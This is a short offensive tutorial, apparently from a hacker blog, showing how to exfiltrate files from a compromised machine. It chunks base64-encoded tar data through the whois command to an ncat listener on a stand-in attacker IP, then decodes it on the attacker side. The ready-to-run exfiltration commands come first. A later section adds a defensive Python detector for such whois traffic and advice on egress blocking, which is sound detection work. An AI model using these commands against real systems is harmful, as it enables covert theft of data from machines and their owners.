Sometimes you may want to transfer (juicy) files from a remote system (that you’ve pwn’d, for instance), only to find that you have limited resources.

What could you do?

Thinking out...

I’ll show you how, using the whois command.

Let’s see…


STEP 1

On the attacker’s terminal, type:

ncat -k -l -p 4444 | tee files.b64

Ncat listens for connections from the target’s machine on port 4444; -k keeps it listening after each connection closes.

Tee then writes the incoming data to a file, so you can make sure you have it.

On the target’s terminal, type:

tar czf - /path/to/directory/* | base64 | xargs -I 2048 timeout 0.03 whois -h attacker.machine.IP -p 4444 2048

Compress the directory you want to transfer and encode it as base64.

Then send 2048 bits of data to the attacker machine through port 4444, with a timeout of 0.03, using the whois command.

STEP 2 (Final)

On the attacker’s terminal, type:

cat files.b64 | tr -d '\r\n' | base64 -d | tar xvz

Read the file containing the base64-encoded tar archive (files.b64).

Strip all “\r\n” sequences.

Base64-decode the output piped from files.b64.

Then untar the archive to retrieve the files.
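From the defender's side, this transfer leaves a clear trace in process-execution logs: whois pointed at a port other than 43, or carrying long base64 lines as its query, many times in a row. The detector below is an added example, not part of the original post; the log format, host names, addresses and the min_hits threshold are assumptions made for illustration.

```python
import re
import shlex
from collections import Counter
WHOIS_PORT = 43  # registered whois port (RFC 3912)
B64_QUERY = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # long base64-looking query

def parse_whois(cmdline):
    """Return (server, port, query) for a whois invocation, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in the logged command line
        return None
    names = [a.rsplit("/", 1)[-1] for a in argv]
    if "whois" not in names:  # also found behind wrappers such as timeout
        return None
    args = iter(argv[names.index("whois") + 1:])
    server, port, query = "", WHOIS_PORT, []
    for arg in args:
        if arg == "-h":
            server = next(args, "")
        elif arg == "-p":
            value = next(args, "")
            port = int(value) if value.isdigit() else -1
        else:
            query.append(arg)
    return server, port, " ".join(query)

def find_whois_exfil(log_text, min_hits=3):
    """Return sorted (host, server, port, hits) groups that look like exfiltration."""
    hits = Counter()
    for line in log_text.splitlines():
        parts = line.split(None, 2)  # assumed format: "<epoch> <host> <command line>"
        parsed = parse_whois(parts[2]) if len(parts) == 3 else None
        if parsed is None:
            continue
        server, port, query = parsed
        if port != WHOIS_PORT or B64_QUERY.fullmatch(query):
            hits[(parts[1], server, port)] += 1
    return sorted(key + (n,) for key, n in hits.items() if n >= min_hits)

# Constructed sample records: hosts, addresses and payload are made up.
CHUNK = "QUJD" * 19  # 76 characters, the default line width of GNU base64
SAMPLE_LOG = "\n".join(
    ["1700000000.00 web01 whois example.org",
     "1700000001.00 db02 /usr/bin/whois -h whois.iana.org example.net"]
    + [f"1700000100.{i:02d} web01 timeout 0.03 whois -h 203.0.113.7 -p 4444 {CHUNK}"
       for i in range(5)])
if __name__ == "__main__":
    for host, server, port, n in find_whois_exfil(SAMPLE_LOG):
        print(f"{host}: {n} whois runs to {server}:{port} with non-query data")
```

Blocking outbound connections from servers to anything but approved whois servers on port 43 removes the channel itself; the detector covers hosts where that egress rule is not in place.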

Thanks, made by ❤️

bl4ckbo7 - PWN | Eat | Sleep | Repeat.
